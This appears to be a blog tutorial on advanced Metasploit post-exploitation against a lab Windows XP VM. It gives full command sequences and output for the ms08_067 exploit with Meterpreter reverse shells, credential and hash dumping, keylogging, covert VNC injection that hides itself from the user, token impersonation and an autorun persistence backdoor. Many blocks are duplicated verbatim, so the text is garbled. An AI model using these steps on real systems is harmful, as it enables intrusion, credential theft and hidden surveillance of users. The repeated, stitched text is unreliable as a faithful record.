The Metasploit framework is well known in the realm of exploit development. It is a standalone tool for security researchers, penetration testers and IDS/IPS developers. As of now, it has 640 exploit definitions and 215 payloads for injection — a huge database. This article focuses on advanced features of the Metasploit framework.
The vulnerable Windows XP SP3 system is used here as the exploit target. The SMB vulnerability used here is msf08_067_netapi (just for demonstration purposes; any vulnerability, including Web-based exploits, can be used here to gain shell access to the system). I am running XP SP3 as a virtual machine under VirtualBox 4.0. Please refer to the article on Metasploit from October 2010, for details about the basic usage of Metasploit.
The vulnerable Windows XP SP3 system is used here as the exploit target. The SMB vulnerability used here is msf08_067_netapi (just for demonstration purposes; any vulnerability, including Web-based exploits, can be used here to gain shell access to the system). I am running XP SP3 as a virtual machine under VirtualBox 4.0. Please refer to the article on Metasploit from October 2010, for details about the basic usage of Metasploit.
101 with Meterpreter payload
The Meta-Interpreter payload is quite a useful payload provided by Metasploit. It can do a lot of things on the target system. It can be injected as follows.
The Windows target system IP address is 192.168.56.101, and the host OS is Ubuntu 9.10 with the IP address of 192.168.56.1. Hence, RHOST is set to 192.168.56.101 and LHOST to 192.168.56.1.The reverse_tcp type payload of Meterpreter will throw back the shell to the host system. The Meterpreter session will open after the successful exploitation.
Terminal output:
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
------- ------------------ ----------- --------------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
------- ------------------ ----------- --------------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ---------
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
------- ------------------ ----------- --------------
RHOST 192.168.56.101 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
------- ------------------ ----------- --------------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST 192.168.56.1 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- --------
0 Automatic Targeting
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1123) at 2011-01-04 20:25:22 +0530
meterpreter >
Important commands in the Meterpreter session
msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
------- ------------------ ----------- --------------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
------- ------------------ ----------- --------------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ---------
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
------- ------------------ ----------- --------------
RHOST 192.168.56.101 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
------- ------------------ ----------- --------------
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST 192.168.56.1 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- --------
0 Automatic Targeting
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (749056 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1123) at 2011-01-04 20:25:22 +0530
meterpreter >
Important commands in the Meterpreter session
checkvm
Entering this will check whether the target is a virtual machine. This is quite useful in environments where a huge virtual infrastructure is present. Think of it as if the process in the virtual machine implementing OS virtualisation (OpenVZ) has gone bad, giving access to all virtual machines running on that physical server.
meterpreter > run checkvm
[*] Checking if target is a Virtual Machine.....
[*] This is a Sun VirtualBox Virtual Machine
meterpreter >
getcountermeasure
[*] Checking if target is a Virtual Machine.....
[*] This is a Sun VirtualBox Virtual Machine
meterpreter >
getcountermeasure
Entering this will get the attack countermeasures deployed at the target system. This is important because there may be a signature-detection system deployed on the target system. This also detects firewall policies and anti-virus software.
meterpreter > run getcountermeasure
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]
[*] Domain profile configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Standard profile configuration (current):
[*] -------------------------------------------------------------------
[*] Operational mode = Disable
[*] Exception mode = Enable
[*]
[*] Local Area Connection firewall configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*]
[*] Checking DEP Support Policy...
meterpreter >
get_local_subnets
[*] Running Getcountermeasure on the target...
[*] Checking for contermeasures...
[*] Getting Windows Built in Firewall configuration...
[*]
[*] Domain profile configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*] Exception mode = Enable
[*]
[*] Standard profile configuration (current):
[*] -------------------------------------------------------------------
[*] Operational mode = Disable
[*] Exception mode = Enable
[*]
[*] Local Area Connection firewall configuration:
[*] -------------------------------------------------------------------
[*] Operational mode = Enable
[*]
[*] Checking DEP Support Policy...
meterpreter >
get_local_subnets
Entering this will give information about the local subnets in which the target system belongs. This is useful to get information about other systems running in the same subnet.
meterpreter > run get_local_subnets
Local subnet: 192.168.56.0/255.255.255.0
meterpreter >
get_application_list
Local subnet: 192.168.56.0/255.255.255.0
meterpreter >
get_application_list
Now, this is very cool. It gives us the whole list of applications installed on the target system, with their versions. We can use this to find specific vulnerabilities in the application version, for further exploitation.
meterpreter > run get_application_list
Installed Applications
======================
Name Version
------- ----------
Adobe AIR 1.5.3.9120
Adobe Flash Player 10 Plugin 10.0.45.2
Adobe Shockwave Player 11.5 11.5.7.609
Acrobat.com 2.0.0.0
ImgBurn 2.4.3.0
Mozilla Firefox (3.5.9) 3.5.9 (en-US)
Notepad++ 5.5
NetBeans IDE 6.7.1 6.7.1
Overlook Fing 1.3
TrueCrypt 6.2
Wireshark 1.0.7 1.0.7
WinPcap 4.1.1 4.1.0.1753
Google Toolbar for Internet Explorer 1.0.0
Microsoft .NET Framework 3.0 3.0.04506.30
Java Auto Updater 2.0.2.1
Microsoft .NET Framework 2.0 2.0.50727
Java(TM) 6 Update 20 6.0.200
HTTP Analyzer V5.2.1 5.2.1
Acrobat.com 2.0.0
Java DB 10.4.2.1 10.4.2.1
meterpreter >
credcollect
Installed Applications
======================
Name Version
------- ----------
Adobe AIR 1.5.3.9120
Adobe Flash Player 10 Plugin 10.0.45.2
Adobe Shockwave Player 11.5 11.5.7.609
Acrobat.com 2.0.0.0
ImgBurn 2.4.3.0
Mozilla Firefox (3.5.9) 3.5.9 (en-US)
Notepad++ 5.5
NetBeans IDE 6.7.1 6.7.1
Overlook Fing 1.3
TrueCrypt 6.2
Wireshark 1.0.7 1.0.7
WinPcap 4.1.1 4.1.0.1753
Google Toolbar for Internet Explorer 1.0.0
Microsoft .NET Framework 3.0 3.0.04506.30
Java Auto Updater 2.0.2.1
Microsoft .NET Framework 2.0 2.0.50727
Java(TM) 6 Update 20 6.0.200
HTTP Analyzer V5.2.1 5.2.1
Acrobat.com 2.0.0
Java DB 10.4.2.1 10.4.2.1
meterpreter >
credcollect
This dumps all the hashes present for the administrator and users. Later on, these hashes can be used to impersonate users, or passwords can be computed by brute-forcing them.
meterpreter > run credcollect
[+] Collecting hashes...
Extracted: Administrator:560c5a660fgd552e7c3113b4a1a5e3a0:a38ad238851d3a6673a0047dc68ff8ca
Extracted: Guest:aad3b435b51404eeaad3b435b51fg4ee:31d6cfe0d16ae931b73c59d7e0c089c0
Extracted: HelpAssistant:ab57d8e30e1020c587e6449d434ca4eb:1ba62a18ffcd37a1754e13cae7afb3ed
Extracted: subodh:560c5a6604dd552e7c3113b4a1a5e3a0:a3jid238851d3a6673a0047dc68ff8ca
Extracted: SUPPORT_3io945a0s and S#:aad3b435b51404eeaad3b435b51404ee:2971f42b141f46b0bijq53cf0176eea3
[+] Collecting tokens...
HAHAHA\subodh
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
NT AUTHORITY\ANONYMOUS LOGON
meterpreter >
hashdump
[+] Collecting hashes...
Extracted: Administrator:560c5a660fgd552e7c3113b4a1a5e3a0:a38ad238851d3a6673a0047dc68ff8ca
Extracted: Guest:aad3b435b51404eeaad3b435b51fg4ee:31d6cfe0d16ae931b73c59d7e0c089c0
Extracted: HelpAssistant:ab57d8e30e1020c587e6449d434ca4eb:1ba62a18ffcd37a1754e13cae7afb3ed
Extracted: subodh:560c5a6604dd552e7c3113b4a1a5e3a0:a3jid238851d3a6673a0047dc68ff8ca
Extracted: SUPPORT_3io945a0s and S#:aad3b435b51404eeaad3b435b51404ee:2971f42b141f46b0bijq53cf0176eea3
[+] Collecting tokens...
HAHAHA\subodh
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
NT AUTHORITY\ANONYMOUS LOGON
meterpreter >
hashdump
Hashes for all users can also be dumped separately, to gain access, or for privilege escalation.
meterpreter > run hashdump
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY a765f7a8d7535845f3bv7104aa69a333...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:560c5a6604dd552e7c3893b4a1a5e3a0:a38ad238851d3a6673a0047dc68ff8ca:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae93jj73c59d7e0c089c0:::
HelpAssistant:1000:ab57d8e30e1020c587e6449d434ca4eb:1ba62a18ffcd37a1754e13cae7afb3ed:::
SUPPORT_388945a0:1002:aad3b435b51124eeaad3b435b51404ee:2971f42b1lof46b0b30f53cf0176eea3:::
subodh:1003:560c5a6604dd552e7c3113b4a1anm3a0:a38ad238851d3a2373a0047dc68ff8ca:::
meterpreter >
keylogrecorder
[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY a765f7a8d7535845f3bv7104aa69a333...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hashes...
Administrator:500:560c5a6604dd552e7c3893b4a1a5e3a0:a38ad238851d3a6673a0047dc68ff8ca:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae93jj73c59d7e0c089c0:::
HelpAssistant:1000:ab57d8e30e1020c587e6449d434ca4eb:1ba62a18ffcd37a1754e13cae7afb3ed:::
SUPPORT_388945a0:1002:aad3b435b51124eeaad3b435b51404ee:2971f42b1lof46b0b30f53cf0176eea3:::
subodh:1003:560c5a6604dd552e7c3113b4a1anm3a0:a38ad238851d3a2373a0047dc68ff8ca:::
meterpreter >
keylogrecorder
This will log all keystrokes made on the target systems to the .msf directory. The payload will live-migrate to the Explorer process displaying the PID of that process, and will start logging the keystrokes. The getpid command can be used to see which process the payload is attached to.
The keystrokes are recorded in a text file in the specified path.
The keystrokes are recorded in a text file in the specified path.
meterpreter > run keylogrecorder
[*] explorer.exe Process found, migrating into 1336
[*] Migration Successful!!
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /home/subodh/.msf3/logs/scripts/keylogrecorder/192.168.56.101_20110104.1024.txt
[*] Recording
[*] Saving last few keystrokes
[*] Interrupt
[*] Stopping keystroke sniffer...
meterpreter > getpid
Current pid: 1336
meterpreter >
shell
[*] explorer.exe Process found, migrating into 1336
[*] Migration Successful!!
[*] Starting the keystroke sniffer...
[*] Keystrokes being saved in to /home/subodh/.msf3/logs/scripts/keylogrecorder/192.168.56.101_20110104.1024.txt
[*] Recording
[*] Saving last few keystrokes
[*] Interrupt
[*] Stopping keystroke sniffer...
meterpreter > getpid
Current pid: 1336
meterpreter >
shell
This will throw back a shell to the host OS. Now we can run whatever we want — having shell access compromises the whole system:
meterpreter > shell
Process 988 created.
Channel 4 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\subodh>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.56.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
C:\Documents and Settings\subodh>exit
meterpreter >
Other features are also present in the Meterpreter payload, such as the downloading and uploading of files. This can be used to create automated exploit modules with Meterpreter.
Process 988 created.
Channel 4 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Documents and Settings\subodh>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.56.101
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . :
C:\Documents and Settings\subodh>exit
meterpreter >
Other features are also present in the Meterpreter payload, such as the downloading and uploading of files. This can be used to create automated exploit modules with Meterpreter.
Remote VNC injection
Using the Metasploit payload for VNC injection, we can also inject a VNC server remotely, and can have the display thrown back to the host system. Users of the target system user will not notice that their display is being shared, though there is a trick — we have to disable the Metasploit courtesy shell which appears on the target system’s display. If the courtesy shell is not disabled, then it will show a blue command prompt window at the time of exploitation, as shown in Figure 1.
Figure 1: VNCInjection with courtesy shell enabled, by default
This can warn the users of the target system, and result in attack detection. After disabling the courtesy shell, it will not display the blue prompt, as you can see in Figure 2.
Figure 2: VNCInjection with courtesy shell disabled
VNC injection can also be used when a user is not logged in; in that case, don’t bother to disable the courtesy shell.
VNCviewer must be installed on the host system to see the VNC session thrown by the target system. I have xtightvncviewer installed on my host Ubuntu 9.10. The VNCHOST parameter is set to 127.0.0.1 by default; we have to change it to the interface on the host system IP on which the VNC session will be spawned — i.e., 192.168.56.1.
VNCviewer must be installed on the host system to see the VNC session thrown by the target system. I have xtightvncviewer installed on my host Ubuntu 9.10. The VNCHOST parameter is set to 127.0.0.1 by default; we have to change it to the interface on the host system IP on which the VNC session will be spawned — i.e., 192.168.56.1.
msf > use windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set payload windows/vncinject/reverse_tcp
payload => windows/vncinject/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
-------- ------------------ ----------- --------------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/vncinject/reverse_tcp):
Name Current Setting Required Description
-------- ----------------- ----------- --------------
AUTOVNC true yes Automatically launch VNC viewer if present
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy
VNCPORT 5900 yes The local port to use for the VNC proxy
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set VNCHOST 192.168.56.1
VNCHOST => 192.168.56.1
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(ms08_067_netapi) > set DisableCourtesyShell TRUE
DisableCourtesyShell => TRUE
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
-------- ------------------ ----------- --------------
RHOST 192.168.56.101 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/vncinject/reverse_tcp):
Name Current Setting Required Description
-------- ------------------ ----------- --------------
AUTOVNC true yes Automatically launch VNC viewer if present
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST 192.168.56.1 yes The listen address
LPORT 4444 yes The listen port
VNCHOST 192.168.56.1 yes The local host to use for the VNC proxy
VNCPORT 5900 yes The local port to use for the VNC proxy
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (445440 bytes) to 192.168.56.101
[*] VNC Server session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1145) at 2011-01-04 22:52:21 +0530
[*] Starting local TCP relay on 192.168.56.1:5900...
[*] Local TCP relay started.
[*] Launched vncviewer.
[*] Session 1 created in the background.
msf exploit(ms08_067_netapi) > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "hahaha"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using shared memory PutImage
Same machine: preferring raw encoding
CleanupSignalHandler called
ShmCleanup called
[*] VNC connection closed.
[*] VNC Server session 1 closed.
msf exploit(ms08_067_netapi) >
Meterpreter incognito mode
msf exploit(ms08_067_netapi) > set payload windows/vncinject/reverse_tcp
payload => windows/vncinject/reverse_tcp
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
-------- ------------------ ----------- --------------
RHOST yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/vncinject/reverse_tcp):
Name Current Setting Required Description
-------- ----------------- ----------- --------------
AUTOVNC true yes Automatically launch VNC viewer if present
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST yes The listen address
LPORT 4444 yes The listen port
VNCHOST 127.0.0.1 yes The local host to use for the VNC proxy
VNCPORT 5900 yes The local port to use for the VNC proxy
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > set VNCHOST 192.168.56.1
VNCHOST => 192.168.56.1
msf exploit(ms08_067_netapi) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(ms08_067_netapi) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(ms08_067_netapi) > set DisableCourtesyShell TRUE
DisableCourtesyShell => TRUE
msf exploit(ms08_067_netapi) > show options
Module options:
Name Current Setting Required Description
-------- ------------------ ----------- --------------
RHOST 192.168.56.101 yes The target address
RPORT 445 yes Set the SMB service port
SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/vncinject/reverse_tcp):
Name Current Setting Required Description
-------- ------------------ ----------- --------------
AUTOVNC true yes Automatically launch VNC viewer if present
EXITFUNC thread yes Exit technique: seh, thread, process, none
LHOST 192.168.56.1 yes The listen address
LPORT 4444 yes The listen port
VNCHOST 192.168.56.1 yes The local host to use for the VNC proxy
VNCPORT 5900 yes The local port to use for the VNC proxy
Exploit target:
Id Name
-- ----
0 Automatic Targeting
msf exploit(ms08_067_netapi) > exploit
[*] Started reverse handler on 192.168.56.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (445440 bytes) to 192.168.56.101
[*] VNC Server session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1145) at 2011-01-04 22:52:21 +0530
[*] Starting local TCP relay on 192.168.56.1:5900...
[*] Local TCP relay started.
[*] Launched vncviewer.
[*] Session 1 created in the background.
msf exploit(ms08_067_netapi) > Connected to RFB server, using protocol version 3.8
Enabling TightVNC protocol extensions
No authentication needed
Authentication successful
Desktop name "hahaha"
VNC server default format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using default colormap which is TrueColor. Pixel format:
32 bits per pixel.
Least significant byte first in each pixel.
True colour: max red 255 green 255 blue 255, shift red 16 green 8 blue 0
Using shared memory PutImage
Same machine: preferring raw encoding
CleanupSignalHandler called
ShmCleanup called
[*] VNC connection closed.
[*] VNC Server session 1 closed.
msf exploit(ms08_067_netapi) >
Meterpreter incognito mode
The Incognito extension of the Meterpreter module is used to impersonate user tokens to achieve privilege escalation, and to maintain access to the system. This is used to execute jobs with the access privileges of the impersonated user. We can also get the process list by using the ps command in Meterpreter; and by using the command steal_token <pid> we can also impersonate our privileges to the level of the process initiator.
This incognito mode helps us in gaining access to the part of the system that is only accessed by users or administrators with higher privileges than the compromised user.
meterpreter > use incognito
Loading extension incognito...success.
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
HAHAHA\subodh
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token HAHAHA\\subodh
[+] Delegation token available
[+] Successfully impersonated user HAHAHA\subodh
meterpreter > getuid
Server username: HAHAHA\subodh
meterpreter > drop_token
Relinquished token, now running as: NT AUTHORITY\SYSTEM
meterpreter >
Meterpreter persistence mode
Loading extension incognito...success.
meterpreter > list_tokens -u
Delegation Tokens Available
========================================
HAHAHA\subodh
NT AUTHORITY\LOCAL SERVICE
NT AUTHORITY\NETWORK SERVICE
NT AUTHORITY\SYSTEM
Impersonation Tokens Available
========================================
NT AUTHORITY\ANONYMOUS LOGON
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > impersonate_token HAHAHA\\subodh
[+] Delegation token available
[+] Successfully impersonated user HAHAHA\subodh
meterpreter > getuid
Server username: HAHAHA\subodh
meterpreter > drop_token
Relinquished token, now running as: NT AUTHORITY\SYSTEM
meterpreter >
Meterpreter persistence mode
The persistence extension is useful to keep access to the system for further exploitation; it is like planting your own back-door for access to that system later on. The Visual Basic script gets installed on the target system. This script loads auto-runs into the system, which keep on making connections to the host IP that was configured at the time of the first exploitation. After that, every time the user logs in, the script throws a shell back to the configured remote IP.
meterpreter > run persistence -U -i 5 -p 443 -r 192.168.56.1
[*] Running Persistance Script
[*] Resource file for cleanup created at /home/subodh/.msf3/logs/scripts/persistence/HAHAHA_20110104.4415/HAHAHA_20110104.4415.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=443
[*] Persistent agent script is 612577 bytes long
[+] Persisten Script written to C:\WINDOWS\TEMP\qabWKT.vbs
[*] Executing script C:\WINDOWS\TEMP\qabWKT.vbs
[+] Agent executed with PID 1200
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jwaGgfooIEPNZ
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jwaGgfooIEPNZ
meterpreter >
Persistence parameters
[*] Running Persistance Script
[*] Resource file for cleanup created at /home/subodh/.msf3/logs/scripts/persistence/HAHAHA_20110104.4415/HAHAHA_20110104.4415.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=443
[*] Persistent agent script is 612577 bytes long
[+] Persisten Script written to C:\WINDOWS\TEMP\qabWKT.vbs
[*] Executing script C:\WINDOWS\TEMP\qabWKT.vbs
[+] Agent executed with PID 1200
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jwaGgfooIEPNZ
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\jwaGgfooIEPNZ
meterpreter >
Persistence parameters
run persistence -U -i 5 -p 443 -r 192.168.56.1
…where:
…where:
-U — automatically starts a module when the user logs in
-i — interval between each connection to the remote IP address configured.
-p — port to reach the remote IP address for Metasploit connection, i.e., the persistence process on the target system will try to connect to 192.168.56.1 on port 443 every 5 seconds.
-r — reachable remote IP address to have handler shell.
Moving on, we just need to load the simpler generic handler exploit module, reverse_tcp payload and wait for the Meterpreter shell to appear. This stub exploit provides an interface for handling the exploit connection. At the time of deploying the exploit script, remember to note the clean-up link. This exploit could be dangerous, as it leaves traces on the target system. Be sure to clean it up after exploitation. The script location and registry entries can be cleared when the access to the target system is no longer required.
-i — interval between each connection to the remote IP address configured.
-p — port to reach the remote IP address for Metasploit connection, i.e., the persistence process on the target system will try to connect to 192.168.56.1 on port 443 every 5 seconds.
-r — reachable remote IP address to have handler shell.
Moving on, we just need to load the simpler generic handler exploit module, reverse_tcp payload and wait for the Meterpreter shell to appear. This stub exploit provides an interface for handling the exploit connection. At the time of deploying the exploit script, remember to note the clean-up link. This exploit could be dangerous, as it leaves traces on the target system. Be sure to clean it up after exploitation. The script location and registry entries can be cleared when the access to the target system is no longer required.
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > show options
Module options:
Name Current Setting Required Description
-------- ------------------ ----------- --------------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
-------- ------------------ ----------- --------------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST 192.168.56.1 yes The listen address
LPORT 443 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.56.1:443
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.56.101
[*] Meterpreter session 3 opened (192.168.56.1:443 -> 192.168.56.101:1049) at 2011-01-05 00:04:58 +0530
meterpreter >
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > show options
Module options:
Name Current Setting Required Description
-------- ------------------ ----------- --------------
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
-------- ------------------ ----------- --------------
EXITFUNC process yes Exit technique: seh, thread, process, none
LHOST 192.168.56.1 yes The listen address
LPORT 443 yes The listen port
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > exploit
[*] Started reverse handler on 192.168.56.1:443
[*] Starting the payload handler...
[*] Sending stage (749056 bytes) to 192.168.56.101
[*] Meterpreter session 3 opened (192.168.56.1:443 -> 192.168.56.101:1049) at 2011-01-05 00:04:58 +0530
meterpreter >
0 comments:
Post a Comment